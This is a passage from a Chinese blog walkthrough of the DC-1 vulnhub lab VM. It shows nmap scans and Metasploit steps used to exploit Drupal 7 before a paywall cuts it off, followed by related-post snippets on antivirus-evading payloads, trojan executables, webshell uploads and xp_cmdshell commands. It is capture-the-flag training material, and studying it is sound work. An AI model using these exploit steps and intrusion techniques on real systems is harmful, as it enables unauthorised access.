DC-1 靶机渗透测试(拿shell,提权)

渗透攻击实战:Drupal7漏洞利用与权限提升
原创 已于 2022-03-17 12:24:47 修改 · 6.3k 阅读 · 23 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全

于 2022-03-17 02:04:25 首次发布
本文记录了一次渗透攻击过程,从环境侦查、信息收集到利用Drupal7漏洞获取shell,修改管理员密码,最终通过SUID提权获取flag。涉及的技术包括nmap扫描、MSFconsole工具、Drupal漏洞利用、MySQL操作及权限管理。

目录

一. 环境

二. 信息收集

1. 主机发现

2.访问 192.168.1.184:80

三. 利用msfconsole 攻击(拿到flag1)

1. 漏洞利用成功

2. 进入会话 ,拿到flag1.txt  ---shell

​ 四. 找到配置文件,获取flag2

 五. 修改管理员密码,登录网站,拿到flag3

1. 获取交互式shell, 执行MySQL语句

 2. 查看管理员用户

 3. 修改管理员密码

 六. 用find语句,找到flag4

七. SUID提权,获取最后的flag

一. 环境

靶机:192.168.1.184

攻击机kali:192.168.1.98

(l网络配置都是NAT模式)

----开始---渗透

二. 信息收集

1. 主机发现

1. nmap -sP 192.168.1.0/24  或  arp-scan -l    #识别目标主机

2. nmap -sn 192.168.1.0/24 或者 nmap -sP 192.168.1.0/24  #主机发现/主机探测 

3. nmap -sS -A -p- 192.168.1.184  #识别目标主机服务,端口

  -A 全面系统检测、启用脚本检测、扫描等
  -sS 半开扫描,很少有系统能把它记入系统日志。不过,需要Root权限

发现了靶机IP 192.168.1.184 及 80端口开放 

2.访问 192.168.1.184:80

发现网站是Drupal(CMS+PHP)搭建的,使用的是Drupal 7版本

三. 利用msfconsole 攻击(拿到flag1)

1. 漏洞利用成功

1. search drupal  #查找drupal的漏洞

2. use 2     #利用第2个龙洞

3. show options   #显示详情

4. set rhosts 192.168.1.184 # 设置靶机地址

5. run 或 exploit  # 开始攻击

  攻击成功后

6. pwd   # 查看当前路径

2. 进入会话 ,拿到flag1.txt  ---shell

最低0.47元/天 解锁文章
DC-4靶机渗透测试
来日可期的博客
08-11 1559
当运行sudo su命令时,系统会要求输入当前用户的密码,以确认你有限切换到root用户。一旦密码验证通过,一个新的shell会打开,并以root用户的身份进行操作。在本例中使用命令后用户在切换到root用户的时候无需输入密码即可登录。
模拟渗透测试——使用metasploit与wget获取靶机shell
mirocky的博客
01-19 1728
前言 近日在复现漏洞时,由于目标所供的服务中的某段代码没有对限进行检查,导致了远程命令执行——RCE漏洞。 由于该漏洞本身的特性,所能执行的命令是需要通过url进行拼接且每次只可执行一句,因此尝试获取靶机shell来做到更多的事。 但在尝试的过程中发现目标对于防渗透措施做的相当不错,删除或者禁用了很多命令,上篇文章(《反弹shell常用命令》)所到的所有方式都没有尝试成功。但天无绝人之路,busybox中wget的身影吸引了我的注意。 环境准备 靶机:ubuntu 192.168.116.128 攻击
[ vulnhub靶机 ] 渗透测试综合靶场 DC-1 通关记录
最新发布
hzb66666的博客
10-26 991
本文详细记录了DC-1靶场渗透测试的完整过程。首先介绍了环境搭建步骤,包括Kali虚拟机和DC-1靶场的安装配置。随后重点描述了渗透过程:使用nmap扫描发现目标开放的22、80、111等端口,识别出运行Drupal 7的Web服务;通过Metasploit框架利用Drupalgeddon2漏洞获取初始shell;进一步通过查找Drupal配置文件获取数据库凭证;最后利用SUID技术获取root限。文章不仅供了详细的操作命令和截图,还深入分析了各漏洞原理,包括Drupal表单API属性注入、数据库配
DC-1靶机渗透测试
weixin_52003758的博客
03-17 544
DC-1靶机渗透测试
Veil生成免杀payload 渗透win10 获取靶机shell
qq_50854662的博客
03-31 772
一:实验环境 两台机器处于同网段 攻击机:kali 192.168.115.134  靶机:win10 192.168.115.1 二:Veil下载、安装、使用 kali里默认没有安装Veil,我们通过命令行安装: apt-get update && apt-get install veil 安装过程有点漫长,如果用的国内源可能会快点。 安装完成后启动V...
msf获取靶机shell进行远控
xiao_he0123的博客
01-25 4317
思路:msf制作exe木马文件靶机通过点击开启后门 原理:靶机执行木马文件后,向本机(你运行msf的主机)中发送信息,本机打开监听状态,收到信息后进行操作 前:知道主机IP(命令行输入ifconfig) (1)msf制作木马 输入命令行生成木马exe并保存在var/www/html文件中,这样靶机就可以直接从网页中下载木马 命令行中参数意义: 然后开启apache服务: (2)靶机下载运行木马本机进行监听 靶机在浏览器中输入192.168.40...
【Vulnhub靶机渗透测试】之DC-1 (SUID
Pluto.的博客
12-27 1096
文章目录Vulnhub靶机渗透测试DC-11. 信息收集2. 漏洞利用 Vulnhub靶机渗透测试 DC-1 环境搭建 靶机镜像下载地址:https://www.vulnhub.com/entry/dc-1,292/; 需要将靶机和kali攻击机放在同一个局域网里; kali的IP地址:192.168.40.1311. 信息收集 使用 nmap 扫描 192.168.40.0/24 网段存活主机 nmap -sP 192.168.40.0/24 简单分析可知,靶机ip为 192
渗透测试-getshell方法总结
Jian Sun_的博客
02-11 3663
一、管理员限拿shell 需要有管理员限才可以拿shell 通常需要登录后台执行相关操作 直接上传拿shell 国内多对上传类型进行了限制,需要在进行绕过操作 1、织梦cms后台为例子 进入后台 写入一个一句话木马 长传一个一句话木马 2、数据库备份拿shell 示例:南方数据 v7.0 良精通用企业网站管理系统 方法一: 1.先上一张图马,得到路径 2.选择数据库备份,将图马备份为a.asp 3.访问xxx/xxx/.../a.asp.
渗透综合靶场---SqlServer
q
12-22 1544
再次查询是否开启3389端口,已开启就使用mstsc连接----exec xp_cmdshell'netstat -ant | find "3389"'查看目标是否开启3389端口----exec xp_cmdshell'netstat -ant | find "3389"'如何找到上传的文件所在目录,使用burp抓包点击文件,然后修改文件名,然后再放包,浏览器因为找不到文件会报错。扫描端口,知道目标ip,扫描目标ip开启了多少端口,(1-65535) 扫描出下面端口。
linux 拿shell,linux下备份拿shell[渗透必备]
weixin_30682635的博客
05-14 1584
关于php包含Apache日志的利用,其实也就是利用交的网址里有php语句,然后再被Apache服务器的日志记录,然后php再去包含执行,从而包含了去执行。当然,这种办法最大的弊端是Apache日志肯定会过大,回应的时候当然会超时什么的,所以也是受条件限制的。全当一种研究算了。下面是我的测试过程,我觉得很有意思,你也看看。比如说,在一个php存在包含漏洞就像这样,存在一句php包含漏洞的语句 i...
渗透测试-getshell学习总结
lza20001103的博客
08-26 3550
getshell学习总结 文章目录getshell学习总结一、方法分类1.带有漏洞的应用2.常规漏洞3.后台拿shell二、网站常见getshell方法1.数据库备份拿shell2.上传3.修改允许上传类型4.服务器解析漏洞5.编辑器6. 网站配置插马7.上传插件8.数据库执行9.文件包含10. 命令执行三、常见cms后台拿shell1.dedecms一、后台文件上传二、数据库执行拿shell2.南方数据、良精、动易一、数据库备份(备份图片马、备份数据库)1.上传图片马2.审查元素,找到图片马路径3.开始备
Stapler-1靶场详细教学(7种漏洞利用+5种
weixin_60374959的博客
12-30 3953
这个靶场令我收获颇深,因为这里利用到的一些手法已经算是实战的技术,同时这里使用了多种方法getshell,getsehll之后又展示了多中方法,更多的开拓了我们的思维。我们这里总共用到了7种方法获取限,5钟方式获取root限,很大程度开阔了哦我们的思路,如果有别的方法的小伙伴欢迎出建议哦。
靶机渗透测试实战(一)——拿下shell之后的操作、SUID的解释
weixin_45116657的博客
09-25 3321
理论基础: 1、使用arp-scan -l命令进行主机扫描,确定主机ip; arp-scan是一个用来进来系统发现和指纹识别的命令行工具。它可以构建并发送ARP请求到指定的IP地址,并且显示返回的任何响应。 arp-scan是Kali Linux自带的一款ARP扫描工具。该工具可以进行单一目标扫描,也可以进行批量扫描。批量扫描的时候,用户可以通过CIDR、地址范围或者列表文件的方式指定。该工具...
靶机渗透测试(CyberSploit: 1
@小张小张的博客
10-12 3168
靶机渗透测试(CyberSploit: 1): Vulnhub靶机 CyberSploit: 1 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Easy–Intermediate) 目标:拿下三个flag.txt 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 终端命令: netdiscover -i eth0 -r 192.168.10.0(网关) 得到靶机ip:192.168.10.7
记一次渗透进学弟服务器Getshell的过程
落日领航员の技术栈
09-06 1914
0x00 写在前面 首先说一句,我真的好久 好久 好久 好久 好久没碰过渗透了,一方面是因为太菜,之前从来都没完整的走完一套getshell,半路卡住是常有,做着做着就give up;另一方面是从实习以来一直做的是安全开发相关的工作,以后工作方向大概率也是安全开发而不是攻防。 那为什么我会忽然想起搞学弟的网站呢?事情是这样的,之前有指导过学弟怎么搭建一套作业交系统,然后学弟就开始自己研究,中间过了好久,我也忘了这码事。 今天晚上他忽然来找我 顺便问他要了网址,也想登上去看看是啥样 本来以为就是个简单的作
渗透测试-地基篇-Webshell-织梦dedecms框架(八)
qq_34801745的博客
11-25 1951
** 渗透测试-地基篇-Webshell-织梦dedecms框架(八) ** 作者:大余 时间:2020-11-25 简介: 渗透测试-地基篇: 该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。 请注意: 对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 名言: 你对这行的兴趣
【红日靶场】3——从靶场配置到漏洞发现、脏牛、反弹shell详细解出
m0_62783065的博客
03-16 2207
【红日靶场】3——从靶场配置到漏洞发现、脏牛、反弹shell详细解出
DC2靶机渗透
q1234syr_的博客
08-04 351
今天我们来学习D2靶机渗透找出所有flag开始进行靶机下载地址:链接:在靶机下载后,将模式改为NAT模式,重启靶机
DC-1靶机实战和分析
weixin_48202759的博客
08-31 1248
前言 我们都知道,对靶机的渗透,可以宽阔自己的解题思路,练习并熟悉相关操作命令,高自己的能力。下面我就对Vulnhub的DC-1靶机进行渗透,靶机设置了5个flag,咱们依次找到它。并通过图文形式讲解涉及到的相关知识点。DC-1靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/ 目标机IP地址:198.162.9.138 攻击机kali IP地址:198.132.9.129 目标探测 渗透测试的第一步,是信息收集,这一步很重要,关系到后面的渗透步骤。下面我们对
DC-1靶机渗透测试攻略及DC-2靶机简介
DC-1靶机渗透测试中,可能会用到的各种技术、工具和概念包括但不限于: - Nmap:一款强大的网络扫描工具,用于发现网络上的设备和开放的端口。 - Metasploit:一个著名的渗透测试平台,包含大量的已知漏洞利用...
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值